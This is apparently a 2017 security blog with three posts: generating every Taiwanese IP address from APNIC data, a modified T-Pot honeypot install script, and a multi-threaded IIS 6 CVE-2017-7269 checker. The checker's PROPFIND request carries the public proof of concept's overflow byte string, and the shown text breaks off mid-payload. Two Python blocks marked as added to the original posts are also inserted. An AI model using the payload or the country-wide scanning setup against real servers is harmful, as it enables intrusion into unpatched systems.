Thursday, May 25, 2017

Using APNIC to Find All of Taiwan's IP Addresses

Taiwan's IP ranges

Taiwan's IP addresses are allocated by APNIC (the Asia-Pacific Network Information Centre), so the latest allocation data for the ranges of each Asian country (Taiwan included, of course) can be looked up on the APNIC website.

Open the URL http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest and you get the AS number and IP range allocations for the Asia-Pacific region, as follows:

######################################################################
#
#  CONDITIONS OF USE
# ____________________________________________________________________
# 
# 
# The files are freely available for download and use on the condition 
# that APNIC will not be held responsible for any loss or damage 
# arising from the use of the information contained in these reports.
# 
# APNIC endeavours to the best of its ability to ensure the accuracy 
# of these reports; however, APNIC makes no guarantee in this regard.
# 
# In particular, it should be noted that these reports seek to 
# indicate where resources were first allocated or assigned. It is not
# intended that these reports be considered as an authoritative 
# statement of the location in which any specific resource may 
# currently be in use.
# 
# For more information see: 
#
#       http://www.apnic.net/db/rir-stats-format.html
# or
# ftp://ftp.apnic.net/pub/apnic/stats/apnic/README.TXT
#
######################################################################
#
2|apnic|20170525|51743|19830613|20170524|+1000
apnic|*|asn|*|7756|summary
apnic|*|ipv4|*|37477|summary
apnic|*|ipv6|*|6510|summary
apnic|JP|asn|173|1|20020801|allocated
apnic|NZ|asn|681|1|20020801|allocated
apnic|AU|asn|1221|1|20000131|allocated
apnic|JP|asn|1233|1|20020801|allocated
apnic|KR|asn|1237|1|20020801|allocated
apnic|SG|asn|1250|1|20020801|allocated
apnic|TW|asn|1659|1|20020801|allocated
apnic|KR|asn|1704|1|20020801|allocated
apnic|TW|asn|1768|2|20020801|allocated
apnic|KR|asn|1781|1|20020801|allocated
apnic|AU|asn|1851|1|20020801|allocated
 
 
 
The file format is described as follows:

allocating registry | country code | IP version | allocated range | number of IPs allocated | allocation date | status

apnic|TW|asn|1659|1|20020801|allocated

So, to get a given country's network prefixes, a further IP mask calculation is needed:


wget -O- 'http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest' | awk -F\| '/TW\|ipv4/ { printf("%s/%d\n", $4, 32-log($5)/log(2)) }' > ./tw_ip.list

That gives you all of Taiwan's IP ranges~~ :)
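Here is an added Python example (not part of the original post) that does the same prefix conversion as the awk one-liner but with exact arithmetic: the awk expression `32-log($5)/log(2)` assumes the count is a power of two, and `printf %d` truncates the result, so a record with a count such as 768 comes out as a /22 and over-includes 256 addresses. The sample records are constructed; the example also totals the address count directly instead of expanding every address the way ipgen does.

```python
import ipaddress

# Constructed sample in the delegated-apnic-latest format. The header, summary and
# ASN lines mirror the listing above; the ipv4 records are made up for this example,
# and one of them (count 768) is deliberately not a power of two.
SAMPLE = """\
2|apnic|20170525|51743|19830613|20170524|+1000
apnic|*|ipv4|*|37477|summary
apnic|TW|asn|1659|1|20020801|allocated
apnic|TW|ipv4|1.34.0.0|65536|20110801|allocated
apnic|JP|ipv4|1.0.16.0|4096|20110412|allocated
apnic|TW|ipv4|1.160.0.0|262144|20110801|allocated
apnic|TW|ipv4|192.0.2.0|768|20100101|assigned
"""


def parse_records(text, country, kind="ipv4"):
    """Yield (start, count) for every record of the given country code and type.

    Comment lines, the version header and the 6-field summary lines are skipped.
    """
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("|")
        if len(fields) < 7 or fields[1] != country or fields[2] != kind:
            continue
        yield fields[3], int(fields[4])


def to_cidrs(start, count):
    """Convert a (first address, count) pair into the minimal list of CIDR blocks.

    Unlike 32 - log2(count), this is exact for any count: a 768-address range
    starting on a /24 boundary becomes a /24 plus a /23 (or a /23 plus a /24,
    depending on alignment), never a single over-wide /22.
    """
    first = ipaddress.ip_address(start)
    last = first + (count - 1)
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]


def country_prefixes(text, country, kind="ipv4"):
    """All CIDR prefixes delegated to a country, in file order."""
    prefixes = []
    for start, count in parse_records(text, country, kind):
        prefixes.extend(to_cidrs(start, count))
    return prefixes


def total_addresses(text, country, kind="ipv4"):
    """Number of delegated addresses, computed from the counts rather than by
    materialising every address into a file."""
    return sum(count for _, count in parse_records(text, country, kind))


def make_matcher(prefixes):
    """Return a predicate answering 'is this address inside these prefixes?',
    which is what a geo-based allowlist or a log enrichment step needs."""
    nets = [ipaddress.ip_network(p) for p in prefixes]

    def contains(addr):
        ip = ipaddress.ip_address(addr)
        return any(ip in net for net in nets)

    return contains


if __name__ == "__main__":
    tw = country_prefixes(SAMPLE, "TW")
    print("\n".join(tw))
    print("total addresses:", total_addresses(SAMPLE, "TW"))
```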


But some readers need every individual IP address, and that takes a small trick:
First, install the ipgen project from GitHub

1. Install ipgen



$ git clone https://github.com/royhills/ipgen.git
$ cd ipgen
$ autoreconf --install
$ ./configure
$ make
$ make check
$ sudo make install


  Note: the automake and autoconf packages must be installed beforehand

 

2. IP Generation Script

#!/bin/bash
# Expand each CIDR prefix in tw_ip.list into individual addresses with ipgen
while read line
do
        ipgen "$line" | tee -a ./tw.ip_address.list
done < ./tw_ip.list


The resulting file of all Taiwan IPs is about 489MB, holding 35,510,560 IPs (a little over 35 million)
<So..... how many does China have??>


Yes~~
China's IP file is about 4.6GB, holding 338,261,890 IPs (a little over 338 million)

 


Sunday, May 21, 2017

T-Pot: A Multi-Honeypot Platform Automated Install Script

Adapted from https://github.com/dtag-dev-sec/t-pot-autoinstall with a few small modifications~
1. After installing Ubuntu, save the shell program below to a file
2. Run it with sudo

#!/bin/bash
##########################################################
# T-Pot 16.10 install script                             #
# Ubuntu server 16.04.0x, x64                            #
#                                                        #
# v1.0 by av, DTAG 2017-01-30                            #
#                                                        #
# based on T-Pot 16.10 Community Edition Script          #
# v16.10.0 by mo, DTAG, 2016-12-03                       #
# Modify by James , 2017-05-21                        #
##########################################################


# Let's create a function for colorful output
Color_ECHO () {
local myRED=1
local myWHT=7
tput setaf $myRED
# -e so the \n sequences used in the messages below are rendered as line breaks
echo -e $1 "$2"
tput setaf $myWHT
}

# used for hostname
fuRANDOMWORD () {
  local myWORDFILE=/usr/share/dict/names
  local myLINES=$(cat $myWORDFILE  | wc -l)
  local myRANDOM=$((RANDOM % $myLINES))
  local myNUM=$((myRANDOM * myRANDOM % $myLINES + 1))
  echo -n $(sed -n "$myNUM p" $myWORDFILE | tr -d \' | tr A-Z a-z)
}


Color_ECHO ""
echo "
##########################################################
# T-Pot 16.10 install script                             #
# for Ubuntu server 16.04.0x, x64                        #
# Modify by James , 2017-05-21                        #
##########################################################
Make sure the key-based SSH login for your normal user is working!
"

# check for superuser
if [[ $EUID -ne 0 ]]; then
    Color_ECHO "### This script must be run as root. Do not run via sudo! Script will abort!"
    exit 1
fi

echo -e "Which user do you usually work with?\nThis script is invoked by root, but what is your normal username?"
echo -n "Enter username: "
read myuser



# Make sure all the necessary prerequisites are met.
echo ""
echo "Checking prerequisites..."

# check if user exists (anchor on the username field so a substring of another account does not match)
if ! grep -q "^$myuser:" /etc/passwd
then
Color_ECHO "### User '$myuser' not found. Script will abort!"
        exit 1
fi


# check if ssh daemon is running
sshstatus=$(service ssh status)
if [[ ! $sshstatus =~ "active (running)" ]];
then
echo "### SSH service is not running. Script will abort!"
echo "### Installing SSH service....."
apt-get install ssh -y
fi

# check for available, non-empty SSH key
if ! fgrep -qs ssh /home/$myuser/.ssh/authorized_keys
    then
        Color_ECHO "### No SSH key for user '$myuser' found in /home/$myuser/.ssh/authorized_keys.\n ### Script will abort!"
        Color_ECHO "Please run ssh-keygen first !"
        Color_ECHO "and cat /home/$myuser/.ssh/id_rsa.pub >> /home/$myuser/.ssh/authorized_keys"
        exit 1
fi


# check for default SSH port
sshport=$(fgrep Port /etc/ssh/sshd_config|cut -d ' ' -f2)
if [ $sshport != 22 ];
    then
        Color_ECHO "### SSH port is not 22. Script will abort!"
        exit 1
fi

# check if pubkey authentication is active
if ! fgrep -q "PubkeyAuthentication yes" /etc/ssh/sshd_config
then
Color_ECHO "### Public Key Authentication is disabled /etc/ssh/sshd_config. \n ### Enable it by changing PubkeyAuthentication to 'yes'."
exit 1
fi

# check for ubuntu 16.04. distribution
release=$(lsb_release -r|cut -d $'\t' -f2)
if [ $release != "16.04" ]
    then
        Color_ECHO "### Wrong distribution. Must be Ubuntu 16.04.*. Script will abort! "
        exit 1
fi

# Let's make sure there is a warning if running for a second time
if [ -f install.log ];
  then
        Color_ECHO "### Running more than once may complicate things. Erase install.log if you are really sure."
        exit 1
fi

# set locale
locale-gen "en_US.UTF-8"
export LC_ALL="en_US.UTF-8"


# Let's log for the beauty of it
set -e
exec 2> >(tee "install.err")
exec > >(tee "install.log")

echo "Everything looks OK..."
echo ""
clear
echo "##########################################################"
echo "#                                                        #"
echo "#     How do you want to proceed? Enter your choice.     #"
echo "#                                                        #"
echo "# 1 - T-Pot's STANDARD INSTALLATION                      #"
echo "#     Requirements: >=4GB RAM, >=64GB disk               #"
echo "#     Services: Cowrie, Dionaea, ElasticPot, Glastopf,   #"
echo "#     Honeytrap, ELK & Suricata                          #"
echo "#                                                        #"
echo "# 2 - T-Pot's HONEYPOTS ONLY (w/o INDUSTRIAL)            #"
echo "#     Requirements: >=3GB RAM, >=64GB disk               #"
echo "#     Services:                                          #"
echo "#     Cowrie, Dionaea, ElasticPot, Glastopf & Honeytrap  #"
echo "#                                                        #"
echo "# 3 - T-Pot's INDUSTRIAL EDITION                         #"
echo "#     Requirements: >=4GB RAM, >=64GB disk               #"
echo "#     Services: ConPot, eMobility, ELK & Suricata        #"
echo "#                                                        #"
echo "# 4 - T-Pot's FULL INSTALLATION                          #"
echo "#     Requirements: >=8GB RAM, >=128GB disk              #"
echo "#     Services: Everything                               #"
echo "#                                                        #"
echo "##########################################################"
echo ""
echo -n "Your choice: "
read choice
if [[ "$choice" != [1-4] ]];
then
    Color_ECHO "### You typed $choice, which I don't recognize. It's either '1', '2', '3' or '4'. Script will abort!"
            exit 1
fi
case $choice in
1)
    echo "You chose T-Pot's STANDARD INSTALLATION. The best default ever!"
    mode="TPOT"
    ;;
2)
    echo "You chose to install T-Pot's HONEYPOTS ONLY. Ack."
    mode="HP"
    ;;
3)
    echo "You chose T-Pot's INDUSTRIAL EDITION. ICS is the new IOT."
    mode="INDUSTRIAL"
    ;;
4)
    echo "You chose to install T-Pot's FULL INSTALLATION. Bring it on..."
    mode="ALL"
    ;;

*)
    Color_ECHO "### You typed $choice, which I don't recognize. It's either '1', '2', '3' or '4'. Script will abort!"
    exit 1
    ;;
esac


# End checks

# Let's pull some updates
Color_ECHO "### Pulling Updates."
apt-get update -y
Color_ECHO "### Installing Updates."
apt-get upgrade -y

# Install packages needed
apt-get install apt-transport-https ca-certificates curl dialog dnsutils dstat ethtool genisoimage git htop libpam-google-authenticator lm-sensors ntp openssh-server syslinux pv vim apache2-utils apparmor nginx aufs-tools bash-completion build-essential  cgroupfs-mount docker.io glances html2text iptables iw libltdl7 man nginx-extras nodejs npm ntp openssl psmisc python-pip -y

# Let's clean up apt
apt-get autoclean -y
apt-get autoremove -y

# Let's remove NGINX default website
Color_ECHO "### Removing NGINX default website."
rm /etc/nginx/sites-enabled/default
rm /etc/nginx/sites-available/default
rm /usr/share/nginx/html/index.html

# Let's ask user for a password for the web user
myOK="n"
myUSER=$myuser
Color_ECHO "### Please enter a password for your user $myuser for web access."
myPASS1="pass1"
myPASS2="pass2"
while [ "$myPASS1" != "$myPASS2"  ]
  do
    while [ "$myPASS1" == "pass1"  ] || [ "$myPASS1" == "" ]
      do
        read -s -p "Password: " myPASS1
        Color_ECHO
      done
    read -s -p "Repeat password: " myPASS2
    Color_ECHO
    if [ "$myPASS1" != "$myPASS2" ];
      then
        Color_ECHO "### Passwords do not match."
        myPASS1="pass1"
        myPASS2="pass2"
    fi
  done
htpasswd -b -c /etc/nginx/nginxpasswd $myUSER $myPASS1
Color_ECHO

# Let's modify the sources list
sed -i '/cdrom/d' /etc/apt/sources.list

# Let's make sure SSH roaming is turned off (CVE-2016-0777, CVE-2016-0778)
Color_ECHO "### Let's make sure SSH roaming is turned off."
tee -a /etc/ssh/ssh_config <<EOF
UseRoaming no
EOF

# Let's generate a SSL certificate
Color_ECHO "### Generating a self-signed-certificate for NGINX."
Color_ECHO "### If you are unsure you can use the default values."
mkdir -p /etc/nginx/ssl
openssl req -nodes -x509 -sha512 -newkey rsa:8192 -keyout "/etc/nginx/ssl/nginx.key" -out "/etc/nginx/ssl/nginx.crt" -days 3650

# Installing alerta-cli, wetty
Color_ECHO "### Installing alerta-cli."
pip install --upgrade pip
pip install alerta
Color_ECHO "### Installing wetty."
ln -s /usr/bin/nodejs /usr/bin/node
npm install https://github.com/t3chn0m4g3/wetty -g


# Let's add a new user
Color_ECHO "### Adding new user."
addgroup --gid 2000 tpot
adduser --system --no-create-home --uid 2000 --disabled-password --disabled-login --gid 2000 tpot

# Let's set the hostname
Color_ECHO "### Setting a new hostname."
myHOST=$(curl -s -f www.nsanamegenerator.com | html2text | tr A-Z a-z | awk '{print $1}')
if [ "$myHOST" = "" ]; then
  Color_ECHO "### Failed to fetch name from remote, using local cache."
  myHOST=$(fuRANDOMWORD)
fi
hostnamectl set-hostname $myHOST
sed -i 's#127.0.1.1.*#127.0.1.1\t'"$myHOST"'#g' /etc/hosts

# Let's patch sshd_config
Color_ECHO "### Patching sshd_config to listen on port 64295 and deny password authentication."
sed -i 's#Port 22#Port 64295#' /etc/ssh/sshd_config
sed -i 's#\#PasswordAuthentication yes#PasswordAuthentication no#' /etc/ssh/sshd_config

# Let's allow ssh password authentication from RFC1918 networks
Color_ECHO "### Allow SSH password authentication from RFC1918 networks"
tee -a /etc/ssh/sshd_config <<EOF
Match address 127.0.0.1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
    PasswordAuthentication yes
EOF

# Let's patch docker defaults, so we can run images as service
Color_ECHO "### Patching docker defaults."
tee -a /etc/default/docker <<EOF
DOCKER_OPTS="-r=false"
EOF

# Let's restart docker for proxy changes to take effect
systemctl restart docker
sleep 5


# getting t-pot git repo
Color_ECHO "### Cloning T-Pot Repository."
cwdir=$(pwd)
git clone https://github.com/dtag-dev-sec/tpotce.git
cp -R $cwdir/tpotce/installer/ $cwdir
rm -rf $cwdir/tpotce/
rm $cwdir/installer/install.sh $cwdir/installer/rc.local.install
cwdir=$cwdir/installer
cd $cwdir

# we need to create a couple of directories
mkdir -p /data/

# Let's make sure only myFLAVOR images will be downloaded and started
case $mode in
  HP)
    echo "### Preparing HONEYPOT flavor installation."
    cp $cwdir/data/imgcfg/hp_images.conf /data/images.conf
  ;;
  INDUSTRIAL)
    echo "### Preparing INDUSTRIAL flavor installation."
    cp $cwdir/data/imgcfg/industrial_images.conf /data/images.conf
  ;;
  TPOT)
    echo "### Preparing TPOT flavor installation."
    cp $cwdir/data/imgcfg/tpot_images.conf /data/images.conf
  ;;
  ALL)
    echo "### Preparing EVERYTHING flavor installation."
    cp $cwdir/data/imgcfg/all_images.conf /data/images.conf
  ;;
esac

# Let's load docker images
Color_ECHO "### Loading docker images. Please be patient, this may take a while."
for name in $(cat /data/images.conf)
    do
      docker pull dtagdevsec/$name:latest1610
    done

# Let's patch /etc/issue for t-pot autoinstall
sed -i '14,15d' $cwdir/etc/issue
echo "Container status is written to ~/docker-status" >> $cwdir/etc/issue

# Let's add the daily update check with a weekly clean interval
Color_ECHO "### Modifying update checks."
tee /etc/apt/apt.conf.d/10periodic <<EOF
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-Upgradeable-Packages "0";
APT::Periodic::AutocleanInterval "7";
EOF

# Let's make sure to reboot the system after a kernel panic
Color_ECHO "### Reboot after kernel panic."
tee -a /etc/sysctl.conf <<EOF
# Reboot after kernel panic, check via /proc/sys/kernel/panic[_on_oops]
kernel.panic = 1
kernel.panic_on_oops = 1
EOF

# Let's add some cronjobs
Color_ECHO "### Adding cronjobs."
tee -a /etc/crontab <<EOF
# Determine running containers every 120s
*/2 * * * * root /usr/bin/status.sh > /home/$myuser/docker-status
# Check if containers and services are up
*/5 * * * * root /usr/bin/check.sh
# Example for alerta-cli IP update
#*/5 * * * * root alerta --endpoint-url http://<ip>:<port>/api delete --filters resource=<host> && alerta --endpoint-url http://<ip>:<port>/api send -e IP -r <host> -E Production -s ok -S T-Pot -t \$(cat /data/elk/logstash/mylocal.ip) --status open
# Check if updated images are available and download them
27 1 * * *   root for i in \$(cat /data/images.conf); do /usr/bin/docker pull dtagdevsec/\$i:latest1610; done
# Restart docker service and containers
27 3 * * * root /usr/bin/dcres.sh
# Delete elastic indices older than 90 days
27 4 * * *  root  /usr/bin/docker exec elk bash -c '/usr/local/bin/curator --host 127.0.0.1 delete indices --older-than 90 --time-unit days --timestring '%Y.%m.%d''
# Update IP and erase check.lock if it exists
27 15 * * * root /etc/rc.local
# Daily reboot
27 23 * * * root reboot
# Check for updated packages every sunday, upgrade and reboot
27 16 * * 0   root  apt-get autoclean -y; apt-get autoremove -y; apt-get update -y; apt-get upgrade -y; sleep 10; reboot
EOF

# Let's create some files and folders
Color_ECHO "### Creating some files and folders."
mkdir -p /data/conpot/log \
         /data/cowrie/log/tty/ /data/cowrie/downloads/ /data/cowrie/keys/ /data/cowrie/misc/ \
         /data/dionaea/log /data/dionaea/bistreams /data/dionaea/binaries /data/dionaea/rtp /data/dionaea/roots/ftp /data/dionaea/roots/tftp /data/dionaea/roots/www /data/dionaea/roots/upnp \
         /data/elasticpot/log \
         /data/elk/data /data/elk/log /data/elk/logstash/conf \
         /data/glastopf /data/honeytrap/log/ /data/honeytrap/attacks/ /data/honeytrap/downloads/ \
         /data/emobility/log \
         /data/ews/log /data/ews/conf /data/ews/dionaea /data/ews/emobility \
         /data/suricata/log /home/$myuser/.ssh/


# Let's take care of some files and permissions
chmod 500 $cwdir/bin/*
chmod 600 $cwdir/data/*
chmod 644 $cwdir/etc/issue
chmod 755 $cwdir/etc/rc.local
chmod 644 $cwdir/data/systemd/*

# Let's copy some files
tar xvfz $cwdir/data/elkbase.tgz -C /
cp $cwdir/data/elkbase.tgz /data/
cp -R $cwdir/bin/* /usr/bin/
cp -R $cwdir/data/* /data/
cp    $cwdir/data/systemd/* /etc/systemd/system/
cp    $cwdir/etc/issue /etc/
cp -R $cwdir/etc/nginx/ssl /etc/nginx/
cp    $cwdir/etc/nginx/tpotweb.conf /etc/nginx/sites-available/
cp    $cwdir/etc/nginx/nginx.conf /etc/nginx/nginx.conf
cp    $cwdir/usr/share/nginx/html/* /usr/share/nginx/html/

for i in $(cat /data/images.conf);
  do
    systemctl enable $i;
done
systemctl enable wetty

# Let's enable T-Pot website
Color_ECHO "### Enabling T-Pot website."
ln -s /etc/nginx/sites-available/tpotweb.conf /etc/nginx/sites-enabled/tpotweb.conf

# Let's take care of some files and permissions
chmod 760 -R /data
chown tpot:tpot -R /data
chmod 600 /home/$myuser/.ssh/authorized_keys
chown $myuser:$myuser /home/$myuser/.ssh /home/$myuser/.ssh/authorized_keys

# Let's replace "quiet splash" options, set a console font for more screen canvas and update grub
sed -i 's#GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"#GRUB_CMDLINE_LINUX_DEFAULT="consoleblank=0"#' /etc/default/grub
sed -i 's#GRUB_CMDLINE_LINUX=""#GRUB_CMDLINE_LINUX="cgroup_enable=memory swapaccount=1"#' /etc/default/grub
#sed -i 's#\#GRUB_GFXMODE=640x480#GRUB_GFXMODE=800x600x32#' /etc/default/grub
#tee -a /etc/default/grub <<EOF
#GRUB_GFXPAYLOAD=800x600x32
#GRUB_GFXPAYLOAD_LINUX=800x600x32
#EOF
update-grub
cp /usr/share/consolefonts/Uni2-Terminus12x6.psf.gz /etc/console-setup/
gunzip /etc/console-setup/Uni2-Terminus12x6.psf.gz
sed -i 's#FONTFACE=".*#FONTFACE="Terminus"#' /etc/default/console-setup
sed -i 's#FONTSIZE=".*#FONTSIZE="12x6"#' /etc/default/console-setup
update-initramfs -u

# Let's enable a color prompt
myROOTPROMPT='PS1="\[\033[38;5;8m\][\[$(tput sgr0)\]\[\033[38;5;1m\]\u\[$(tput sgr0)\]\[\033[38;5;6m\]@\[$(tput sgr0)\]\[\033[38;5;4m\]\h\[$(tput sgr0)\]\[\033[38;5;6m\]:\[$(tput sgr0)\]\[\033[38;5;5m\]\w\[$(tput sgr0)\]\[\033[38;5;8m\]]\[$(tput sgr0)\]\[\033[38;5;1m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"'
myUSERPROMPT='PS1="\[\033[38;5;8m\][\[$(tput sgr0)\]\[\033[38;5;2m\]\u\[$(tput sgr0)\]\[\033[38;5;6m\]@\[$(tput sgr0)\]\[\033[38;5;4m\]\h\[$(tput sgr0)\]\[\033[38;5;6m\]:\[$(tput sgr0)\]\[\033[38;5;5m\]\w\[$(tput sgr0)\]\[\033[38;5;8m\]]\[$(tput sgr0)\]\[\033[38;5;2m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"'
tee -a /root/.bashrc << EOF
$myROOTPROMPT
EOF
tee -a /home/$myuser/.bashrc << EOF
$myUSERPROMPT
EOF

# Let's create ews.ip before reboot and prevent race condition for first start
myLOCALIP=$(hostname -I | awk '{ print $1 }')
myEXTIP=$(curl myexternalip.com/raw)
sed -i "s#IP:.*#IP: $myLOCALIP, $myEXTIP#" /etc/issue
sed -i "s#SSH:.*#SSH: ssh -l $myuser -p 64295 $myLOCALIP#" /etc/issue
sed -i "s#WEB:.*#WEB: https://$myLOCALIP:64297#" /etc/issue

tee /data/ews/conf/ews.ip << EOF
[MAIN]
ip = $myEXTIP
EOF
echo $myLOCALIP > /data/elk/logstash/mylocal.ip
chown $myuser:$myuser /data/ews/conf/ews.ip

# change user for wetty
sed -i 's/tsec/'$myuser'/' /etc/systemd/system/wetty.service
sed -i 's/tsec/'$myuser'/' /usr/share/nginx/html/navbar.html
systemctl daemon-reload

# Final steps
Color_ECHO "### Thanks for your patience. Now rebooting. Remember to login on SSH port 64295 next time or visit dashboard at port 64297!"
mv $cwdir/etc/rc.local /etc/rc.local && rm -rf $cwdir && sleep 2 &&reboot
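An added check, not part of the script above or of T-Pot itself: after the installer rewrites sshd_config, this Python snippet parses the resulting file with sshd's first-value-wins and Match-override semantics and confirms that password authentication stays off for public sources and is re-enabled only through the RFC1918 Match block. The sshd_config excerpt is constructed, and only `Match address` criteria are handled.

```python
import ipaddress

# Constructed sshd_config excerpt reflecting what the install script leaves behind:
# Port rewritten to 64295, PasswordAuthentication no globally, and the Match block
# appended at the end that allows passwords from loopback and RFC1918 sources only.
SAMPLE_SSHD_CONFIG = """\
# Package generated configuration file
Port 64295
Protocol 2
PubkeyAuthentication yes
PasswordAuthentication no
Match address 127.0.0.1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
    PasswordAuthentication yes
"""


def parse_sshd_config(text):
    """Split sshd_config into global options and an ordered list of Match blocks.

    sshd keeps the first value it sees for a keyword within a scope, so later
    duplicates are ignored here too.  Only 'Match address' criteria are supported,
    which is an assumption of this example (it is the only kind the script writes).
    """
    glob = {}
    blocks = []          # [(list of ip_network, {keyword: value}), ...]
    current = None       # option dict of the Match block being read, if any
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "match":
            crit, _, arg = value.partition(" ")
            if crit.lower() != "address":
                raise ValueError("unsupported Match criterion: " + crit)
            nets = [ipaddress.ip_network(a.strip(), strict=False) for a in arg.split(",")]
            current = {}
            blocks.append((nets, current))
            continue
        scope = glob if current is None else current
        scope.setdefault(key, value)
    return glob, blocks


def effective(config, keyword, client_ip):
    """Value a connection from client_ip receives: the first Match block whose
    address list contains the client and which sets the keyword overrides the
    global value; otherwise the global value (None if unset)."""
    glob, blocks = config
    ip = ipaddress.ip_address(client_ip)
    key = keyword.lower()
    for nets, opts in blocks:
        if key in opts and any(ip in net for net in nets):
            return opts[key]
    return glob.get(key)


def check_tpot_policy(text):
    """Return a list of findings; an empty list means the file matches the
    policy the installer intends."""
    cfg = parse_sshd_config(text)
    glob = cfg[0]
    findings = []
    if glob.get("port") != "64295":
        findings.append("sshd not moved off port 22 to 64295")
    if glob.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("PubkeyAuthentication disabled")
    # A client on a public address (TEST-NET-3 here) must not get password auth.
    if effective(cfg, "PasswordAuthentication", "203.0.113.10") != "no":
        findings.append("password authentication reachable from a public address")
    # A management host on an RFC1918 address is expected to keep password auth.
    if effective(cfg, "PasswordAuthentication", "192.168.1.20") != "yes":
        findings.append("password authentication not allowed from RFC1918")
    return findings


if __name__ == "__main__":
    print(check_tpot_policy(SAMPLE_SSHD_CONFIG) or "policy OK")
```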

Saturday, April 1, 2017

CVE-2017-7269 Vulnerability (Multi-Threaded Check)

Microsoft IIS 6.0 Buffer Overflow Zero Day


A multi-threaded IIS 6 CVE-2017-7269 vulnerability checker that I rewrote based on the PoC code published online

#!/usr/bin/python

import sys
import socket
import threading
import time
global data


class Scanner(threading.Thread):
    def __init__(self, host, port):
        threading.Thread.__init__(self)
        self.host = host
        self.port = port
        self.status = ""

    def run(self):
        pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
        pay+='If: <http://localhost/aaaaaaa'
        pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
        pay+='>'
        pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
